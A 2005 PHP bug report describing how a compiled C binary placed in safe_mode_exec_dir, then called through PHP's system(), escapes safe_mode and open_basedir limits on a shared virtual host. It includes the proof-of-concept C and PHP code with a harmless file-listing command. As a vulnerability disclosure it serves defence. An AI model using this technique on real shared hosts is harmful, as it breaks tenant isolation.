#32421 [NEW]: Execution functions bypass safe_mode configurations

Tue, 22 Mar 2005 16:10:41 -0800 

From:             ricardi at gmail dot com
Operating system: *nix (Tested on Linux)
PHP version:      4.3.10
PHP Bug Type:     Program Execution
Bug description:  Execution functions bypass safe_mode configurations

Description:
------------
We bypass the safe_mode restrictions using binary with "system" function
built-in. The problem occurs when we had an incident in a mass virtualhost
machine. One of the domains, execute a script that bypass the safe_mode
restrictions like open_base_dir and safe_mode_exec_dir. 

The configurations in the virtualhost was like:

<VirtualHost *>
ServerName www.something.com
ServerPath /mnt/nfs/domains/something.com.br/www
php_admin_value open_basedir /mnt/nfs/domains/something.com.br/
php_admin_value upload_tmp_dir /mnt/nfs/domains/something.com.br/
php_admin_value safe_mode_include_dir /mnt/nfs/domains/something.com.br/
php_admin_value safe_mode_exec_dir /mnt/nfs/domains/something.com.br/
...

</VirtualHost>

We create a simple program in "C" that create a file outside the
open_basedir and execute a binary that isn't in the safe_mode_exec_dir:
/* ---------------
Contents of file.c 
 ---------------- */

#include <stdio.h>

int main() {
        system("find / -maxdepth 1 > /tmp/trash.txt");
        return 0;
}

Compiling: gcc -o file file.c

With an ftp access, we put the file in the safe_mode_exec_dir:

> ls -la mnt/nfs/domains/something.com.br/
-rwxr-xr-x    1 nfsnobod nfsnobod    13576 Mar 22 16:57 file

Now create a php script that calls the binary.

<?php
system("file");
?>

Then put this on the webroot and after accessing the script with
http://www.something.com.br/script.php, check the /tmp:

> ls -la /tmp
-rw-r--r--    1 nfsnobody     nfsnobody          139 Mar 22 21:00
trash.txt

We had to disable the execution feature from our product. 


-- 
Edit bug report at http://bugs.php.net/?id=32421&edit=1
-- 
Try a CVS snapshot (php4):   http://bugs.php.net/fix.php?id=32421&r=trysnapshot4
Try a CVS snapshot (php5.0): 
http://bugs.php.net/fix.php?id=32421&r=trysnapshot50
Try a CVS snapshot (php5.1): 
http://bugs.php.net/fix.php?id=32421&r=trysnapshot51
Fixed in CVS:                http://bugs.php.net/fix.php?id=32421&r=fixedcvs
Fixed in release:            http://bugs.php.net/fix.php?id=32421&r=alreadyfixed
Need backtrace:              http://bugs.php.net/fix.php?id=32421&r=needtrace
Need Reproduce Script:       http://bugs.php.net/fix.php?id=32421&r=needscript
Try newer version:           http://bugs.php.net/fix.php?id=32421&r=oldversion
Not developer issue:         http://bugs.php.net/fix.php?id=32421&r=support
Expected behavior:           http://bugs.php.net/fix.php?id=32421&r=notwrong
Not enough info:             
http://bugs.php.net/fix.php?id=32421&r=notenoughinfo
Submitted twice:             
http://bugs.php.net/fix.php?id=32421&r=submittedtwice
register_globals:            http://bugs.php.net/fix.php?id=32421&r=globals
PHP 3 support discontinued:  http://bugs.php.net/fix.php?id=32421&r=php3
Daylight Savings:            http://bugs.php.net/fix.php?id=32421&r=dst
IIS Stability:               http://bugs.php.net/fix.php?id=32421&r=isapi
Install GNU Sed:             http://bugs.php.net/fix.php?id=32421&r=gnused
Floating point limitations:  http://bugs.php.net/fix.php?id=32421&r=float
No Zend Extensions:          http://bugs.php.net/fix.php?id=32421&r=nozend
MySQL Configuration Error:   http://bugs.php.net/fix.php?id=32421&r=mysqlcfg

Reply via email to